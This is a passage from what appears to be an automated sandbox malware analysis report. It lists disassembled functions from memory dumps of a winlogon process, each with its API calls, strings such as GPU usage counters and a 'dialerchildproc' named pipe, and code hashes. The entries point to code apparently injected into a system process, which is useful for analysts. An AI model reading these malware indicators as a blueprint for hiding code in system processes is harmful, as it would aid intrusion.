                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Value$ErrorLast$Heap$AllocFree
                                                                  • String ID:
                                                                  • API String ID: 570795689-0
                                                                  • Opcode ID: ed67185a8b28226d4ae9e946df9fda9d74e56255075e212544000e561ebf9f9b
                                                                  • Instruction ID: 9a6a97e40900111dbf4723c648f89434ea414971c8025d7e99afb3788b85548f
                                                                  • Opcode Fuzzy Hash: ed67185a8b28226d4ae9e946df9fda9d74e56255075e212544000e561ebf9f9b
                                                                  • Instruction Fuzzy Hash: 83419F2C309E64B2FE58A7FD595D76D22425F857F2F24CF24AA360AED6DE38C446C201
                                                                  Function 00000225DC64D258 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,?,?,00000225DC650E9B,?,?,?,00000225DC65088C,?,?,?,00000225DC64CC7F), ref: 00000225DC64D267
                                                                  • FlsGetValue.KERNEL32(?,?,?,00000225DC650E9B,?,?,?,00000225DC65088C,?,?,?,00000225DC64CC7F), ref: 00000225DC64D27C
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC650E9B,?,?,?,00000225DC65088C,?,?,?,00000225DC64CC7F), ref: 00000225DC64D29D
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC650E9B,?,?,?,00000225DC65088C,?,?,?,00000225DC64CC7F), ref: 00000225DC64D2CA
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC650E9B,?,?,?,00000225DC65088C,?,?,?,00000225DC64CC7F), ref: 00000225DC64D2DB
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC650E9B,?,?,?,00000225DC65088C,?,?,?,00000225DC64CC7F), ref: 00000225DC64D2EC
                                                                  • SetLastError.KERNEL32(?,?,?,00000225DC650E9B,?,?,?,00000225DC65088C,?,?,?,00000225DC64CC7F), ref: 00000225DC64D307
                                                                  • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC650E9B,?,?,?,00000225DC65088C,?,?,?,00000225DC64CC7F), ref: 00000225DC64D33D
                                                                  • FlsSetValue.KERNEL32(?,?,00000001,00000225DC64F0FC,?,?,?,?,00000225DC64C3CF,?,?,?,?,?,00000225DC647EE0), ref: 00000225DC64D35C
                                                                    • Part of subcall function 00000225DC64DAFC: HeapAlloc.KERNEL32(?,?,00000000,00000225DC64D432,?,?,?,00000225DC64DAE5,?,?,?,?,00000225DC64DBA8), ref: 00000225DC64DB51
                                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC650E9B,?,?,?,00000225DC65088C,?,?,?,00000225DC64CC7F), ref: 00000225DC64D384
                                                                    • Part of subcall function 00000225DC64DB74: HeapFree.KERNEL32(?,?,?,?,?,?,?,00000225DC64643A), ref: 00000225DC64DB8A
                                                                    • Part of subcall function 00000225DC64DB74: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000225DC64643A), ref: 00000225DC64DB94
                                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC650E9B,?,?,?,00000225DC65088C,?,?,?,00000225DC64CC7F), ref: 00000225DC64D395
                                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC650E9B,?,?,?,00000225DC65088C,?,?,?,00000225DC64CC7F), ref: 00000225DC64D3A6
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Value$ErrorLast$Heap$AllocFree
                                                                  • String ID:
                                                                  • API String ID: 570795689-0
                                                                  • Opcode ID: ed67185a8b28226d4ae9e946df9fda9d74e56255075e212544000e561ebf9f9b
                                                                  • Instruction ID: 2b824970acb9dcbc4bff42bd92427c46f6650ee6e29246732c69fdfdc3e33568
                                                                  • Opcode Fuzzy Hash: ed67185a8b28226d4ae9e946df9fda9d74e56255075e212544000e561ebf9f9b
                                                                  • Instruction Fuzzy Hash: F641BE2CB0DE64B2FE59A3FE945D36A32425B467B2F14C7A4AA37467C6DE38C481C201
                                                                  Function 00000225DC672FAC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                                  • String ID: \GPU Engine(*)\Running Time
                                                                  • API String ID: 1943346504-1805530042
                                                                  • Opcode ID: 7a97016342490a0645e117d0aabf47d1727a4fd40327ed8f0cace4092c4eefd3
                                                                  • Instruction ID: 586c3592aade3638f7f9e5f03ce644c723cfb96d9d5ac5cf597b2c80badf19fa
                                                                  • Opcode Fuzzy Hash: 7a97016342490a0645e117d0aabf47d1727a4fd40327ed8f0cace4092c4eefd3
                                                                  • Instruction Fuzzy Hash: F4319526600F60E7F710CFAAA80C759A3A0FB88F96F5485359F4947AA5DF38C455C740
                                                                  Function 00000225DC642FAC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                                  • String ID: \GPU Engine(*)\Running Time
                                                                  • API String ID: 1943346504-1805530042
                                                                  • Opcode ID: 7a97016342490a0645e117d0aabf47d1727a4fd40327ed8f0cace4092c4eefd3
                                                                  • Instruction ID: c52f9be0bf70ea3b7a5bf3996fbcc68945e9821ba3be50fd257b62d70a75478f
                                                                  • Opcode Fuzzy Hash: 7a97016342490a0645e117d0aabf47d1727a4fd40327ed8f0cace4092c4eefd3
                                                                  • Instruction Fuzzy Hash: FC31C526618E64A6F760DFEAA80C359B3A0F798F97F5482259E4943B64DF38C055C740
                                                                  Function 00000225DC6730BC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                                                  • API String ID: 1943346504-3507739905
                                                                  • Opcode ID: a4d014078471b981586e837c2868b443f3fcdd08967b9f8fe30d7546c34e5f89
                                                                  • Instruction ID: d0907001e34247cac9d8e3e066ca62c72457a451ffc66ac22ab6a61c28d5a96a
                                                                  • Opcode Fuzzy Hash: a4d014078471b981586e837c2868b443f3fcdd08967b9f8fe30d7546c34e5f89
                                                                  • Instruction Fuzzy Hash: A431DD79610F61AAF750CFAAA84C759B3A0FB84F82F5485349F8A47BA5DF38C445C300
                                                                  Function 00000225DC6430BC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                                                  • API String ID: 1943346504-3507739905
                                                                  • Opcode ID: a4d014078471b981586e837c2868b443f3fcdd08967b9f8fe30d7546c34e5f89
                                                                  • Instruction ID: 454cdb5cc7f902d6dfd55ac9d910808eab48d9914d8cbcf09632d57ceb8e022e
                                                                  • Opcode Fuzzy Hash: a4d014078471b981586e837c2868b443f3fcdd08967b9f8fe30d7546c34e5f89
                                                                  • Instruction Fuzzy Hash: 91318B69628F65E6F750DFAAA84CB69B3A0FB84F86F1481359E8A43724DF38D445C700
                                                                  Function 00000225DC67A974 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                  • String ID: csm$csm$csm
                                                                  • API String ID: 849930591-393685449
                                                                  • Opcode ID: 97224decaf04aa8a96cad19aafa8d0fc2d444fbfe93f120d80d8953d06d5a995
                                                                  • Instruction ID: 0cdbf3a16c64a1338def181915019ab7a22a83db87a69e377a0e486a60e7a651
                                                                  • Opcode Fuzzy Hash: 97224decaf04aa8a96cad19aafa8d0fc2d444fbfe93f120d80d8953d06d5a995
                                                                  • Instruction Fuzzy Hash: FDE1B23A600F50AAEB20DFA9D54839D37E4F745B8AF209916EE8957FDACB34C581C700
                                                                  Function 00000225DC619D74 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000003.1768686905.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_3_225dc610000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                  • String ID: csm$csm$csm
                                                                  • API String ID: 849930591-393685449
                                                                  • Opcode ID: 9cfecb073a77c82b5205d4ec5f6c3b841c922ed377687b22fe55079c845d3249
                                                                  • Instruction ID: 91cf044dcba0e316c6a94bb843b20a49ec537f1a727c8145e8dbf45d5273eacd
                                                                  • Opcode Fuzzy Hash: 9cfecb073a77c82b5205d4ec5f6c3b841c922ed377687b22fe55079c845d3249
                                                                  • Instruction Fuzzy Hash: C7E1D53A605F509AEF20DFA9D48939D77A0F745B9BF208115EF8957B9ACB34C581C700
                                                                  Function 00000225DC64A974 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                  • String ID: csm$csm$csm
                                                                  • API String ID: 849930591-393685449
                                                                  • Opcode ID: 97224decaf04aa8a96cad19aafa8d0fc2d444fbfe93f120d80d8953d06d5a995
                                                                  • Instruction ID: f382be736c8d4d53ce86f08bc3e444f2ccae0d56357efb965fd686541566202e
                                                                  • Opcode Fuzzy Hash: 97224decaf04aa8a96cad19aafa8d0fc2d444fbfe93f120d80d8953d06d5a995
                                                                  • Instruction Fuzzy Hash: A1E1B37A60CF50AAFB60DFADD44839D37A4F745B8AF208155EE8A57B9ACB34C581C700
                                                                  Function 00000225DC67F7C4 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: AddressFreeLibraryProc
                                                                  • String ID: api-ms-$ext-ms-
                                                                  • API String ID: 3013587201-537541572
                                                                  • Opcode ID: 00167ab4370d744fa0294c6334099228d3e91a4042df4aa134bc83b99d5d7789
                                                                  • Instruction ID: c897da882854f9e3d26ad73f1ae6e241e834036224319f424e95c785e8117246
                                                                  • Opcode Fuzzy Hash: 00167ab4370d744fa0294c6334099228d3e91a4042df4aa134bc83b99d5d7789
                                                                  • Instruction Fuzzy Hash: AD41E729311E20B1FB16CBAEA90CB5523A1FB49BE1F54CA25AD0D8BBC4EF38C445D341
                                                                  Function 00000225DC64F7C4 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: AddressFreeLibraryProc
                                                                  • String ID: api-ms-$ext-ms-
                                                                  • API String ID: 3013587201-537541572
                                                                  • Opcode ID: 00167ab4370d744fa0294c6334099228d3e91a4042df4aa134bc83b99d5d7789
                                                                  • Instruction ID: 2d334986c2a34472e8b33a964f8069c2c6fc284977a90c17ab4222e0943c1c6f
                                                                  • Opcode Fuzzy Hash: 00167ab4370d744fa0294c6334099228d3e91a4042df4aa134bc83b99d5d7789
                                                                  • Instruction Fuzzy Hash: FE41D32931DE20B5FB16CBEEA80875533A1FB45BA2F198129AD0F8B784EF38C445D301
                                                                  Function 00000225DC67104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                  • String ID: d
                                                                  • API String ID: 3743429067-2564639436
                                                                  • Opcode ID: 4fe3aae0cbb599a1eee1f2be40b2bdf186d2f5bad4b5f62f31428b11ea11a368
                                                                  • Instruction ID: 44decc96365dca59f4748440e41b87c1bea2e1dda2114f176bb14cf4e124cbfa
                                                                  • Opcode Fuzzy Hash: 4fe3aae0cbb599a1eee1f2be40b2bdf186d2f5bad4b5f62f31428b11ea11a368
                                                                  • Instruction Fuzzy Hash: AC416F77214F90D6E760CFA5E45839AB7A1F388B99F448129DB890BB98DF38C549CB00
                                                                  Function 00000225DC64104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                  • String ID: d
                                                                  • API String ID: 3743429067-2564639436
                                                                  • Opcode ID: 4fe3aae0cbb599a1eee1f2be40b2bdf186d2f5bad4b5f62f31428b11ea11a368
                                                                  • Instruction ID: eb49eb748c89d3ea360b01ac63e6da2e3fd63eeae5794c5364ff5fd5cc2816dc
                                                                  • Opcode Fuzzy Hash: 4fe3aae0cbb599a1eee1f2be40b2bdf186d2f5bad4b5f62f31428b11ea11a368
                                                                  • Instruction Fuzzy Hash: EB418377218F90D6E760CFA5E44879E77A1F388B99F148115DB8A07B58DF38C449CB00
                                                                  Function 00000225DC67D498 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FlsGetValue.KERNEL32(?,?,?,00000225DC67CC0E,?,?,?,?,?,?,?,?,00000225DC67D3CD,?,?,00000001), ref: 00000225DC67D4B7
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC67CC0E,?,?,?,?,?,?,?,?,00000225DC67D3CD,?,?,00000001), ref: 00000225DC67D4D6
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC67CC0E,?,?,?,?,?,?,?,?,00000225DC67D3CD,?,?,00000001), ref: 00000225DC67D4FE
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC67CC0E,?,?,?,?,?,?,?,?,00000225DC67D3CD,?,?,00000001), ref: 00000225DC67D50F
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC67CC0E,?,?,?,?,?,?,?,?,00000225DC67D3CD,?,?,00000001), ref: 00000225DC67D520
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Value
                                                                  • String ID: 1%$Y%
                                                                  • API String ID: 3702945584-1395475152
                                                                  • Opcode ID: 414de4670033e7547a0a5b3bdda6d862915786416a62f5675f2ee32494ca94ec
                                                                  • Instruction ID: 7a5cade007396d89c313b2eded1a0e0c2a17c4b5336f1a6556e0ae1fe585a1f5
                                                                  • Opcode Fuzzy Hash: 414de4670033e7547a0a5b3bdda6d862915786416a62f5675f2ee32494ca94ec
                                                                  • Instruction Fuzzy Hash: 1911E728305E64B2FE5897FDA94D33922415F847F6F54CF24A8390AFDADE38C456C601
                                                                  Function 00000225DC64D498 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FlsGetValue.KERNEL32(?,?,?,00000225DC64CC0E,?,?,?,?,?,?,?,?,00000225DC64D3CD,?,?,00000001), ref: 00000225DC64D4B7
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC64CC0E,?,?,?,?,?,?,?,?,00000225DC64D3CD,?,?,00000001), ref: 00000225DC64D4D6
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC64CC0E,?,?,?,?,?,?,?,?,00000225DC64D3CD,?,?,00000001), ref: 00000225DC64D4FE
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC64CC0E,?,?,?,?,?,?,?,?,00000225DC64D3CD,?,?,00000001), ref: 00000225DC64D50F
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000225DC64CC0E,?,?,?,?,?,?,?,?,00000225DC64D3CD,?,?,00000001), ref: 00000225DC64D520
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Value
                                                                  • String ID: 1%$Y%
                                                                  • API String ID: 3702945584-1395475152
                                                                  • Opcode ID: 414de4670033e7547a0a5b3bdda6d862915786416a62f5675f2ee32494ca94ec
                                                                  • Instruction ID: 7258fba70c469de14b0abad65e245d1751330628400bd6022e2dbc4a76e57fcf
                                                                  • Opcode Fuzzy Hash: 414de4670033e7547a0a5b3bdda6d862915786416a62f5675f2ee32494ca94ec
                                                                  • Instruction Fuzzy Hash: 7311B228B0DE6461FE58A7FEE54D36932415F847F6F44C3A4A83B46BDADE38C482C601
                                                                  Function 00000225DC672334 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                                  • String ID: \\.\pipe\dialerchildproc
                                                                  • API String ID: 166002920-1933775637
                                                                  • Opcode ID: 46ac6f3595cd08ba72cfe16ac14249d71bcf4bf6cdab2aa291378c72e2095538
